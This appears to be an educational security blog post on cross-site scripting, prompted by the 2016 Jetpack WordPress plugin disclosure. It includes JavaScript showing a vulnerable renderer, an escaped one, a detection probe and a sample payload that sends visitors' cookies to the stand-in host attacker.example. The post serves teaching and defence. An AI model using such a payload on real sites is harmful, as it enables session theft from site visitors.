On May 26th 2016, Jetpack disclosed an XSS vulnerability discovered in their popular WordPress plugin.
We would like to take this opportunity to describe what XSS is.
Cross-Site Scripting (XSS) refers to the injection of malicious code, usually JavaScript, into pages served by a legitimate website. When website users later visit these compromised pages, the injected code (the payload) is executed by the client-side application, the visitor's web browser, in the context of the legitimate site. From there it can perform the actual malicious action: redirecting the visitor to another website, downloading and installing malware, displaying adult ads, or reading the visitor's session cookie and acting on their behalf.
Some XSS vulnerabilities are trivial and are picked up by an XSS vulnerability scanner. Their more complex variants, however, can go unnoticed for years, as with the Jetpack plugin, where the XSS vulnerability had remained undetected since 2012.
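To make the definition above concrete, here is an added example in JavaScript (it is not code from Jetpack or from this post): a page renderer that pastes a visitor-supplied comment into HTML unescaped, the same renderer with HTML escaping applied, and a scanner-style probe of the kind mentioned above that detects whether a tag submitted as input comes back unescaped. The function names, the `escapeHtml` helper, the sample payload and the attacker host are all assumptions made for this example.

```javascript
// Added example, not Jetpack's code: a minimal page renderer that embeds a
// visitor-controlled value (a comment) into HTML, in a vulnerable and in a
// hardened form, plus a scanner-style probe.  All names are hypothetical.

// Escape the five characters that can change the meaning of text placed in
// an HTML text node or a double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the untrusted comment lands in the page verbatim, so a
// <script> tag inside it runs in every visitor's browser.
function renderCommentVulnerable(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened: same template, but the value is escaped for the HTML text
// context, so the browser shows the tag as text instead of executing it.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Scanner-style probe: submit a unique marker wrapped in a <script> tag and
// report whether the tag survives into the rendered output unescaped.
// The marker string is a constructed value.
function reflectsUnescaped(render) {
  const marker = "xsscheck1234";
  const probe = `<script>${marker}</script>`;
  return render(probe).includes(probe);
}

// Constructed sample payload a visitor might post: it sends the cookie of
// anyone viewing the page to a placeholder attacker-controlled host.
const samplePayload =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Run both renderers over the payload and both probes, returning the results.
function demo() {
  return {
    vulnerable: renderCommentVulnerable(samplePayload),
    safe: renderCommentSafe(samplePayload),
    vulnerableReflects: reflectsUnescaped(renderCommentVulnerable),
    safeReflects: reflectsUnescaped(renderCommentSafe),
  };
}

console.log(demo());
```

Run it with `node xss-demo.js`; the vulnerable rendering contains a live `<script>` tag, the safe one contains `&lt;script&gt;`, and the probe flags only the vulnerable renderer. Note that `escapeHtml` is correct only for HTML text and quoted attribute values; input placed inside a JavaScript string, a URL or a CSS rule needs the encoding of that context instead. In WordPress plugin code the equivalent helpers are `esc_html()` and `esc_attr()`.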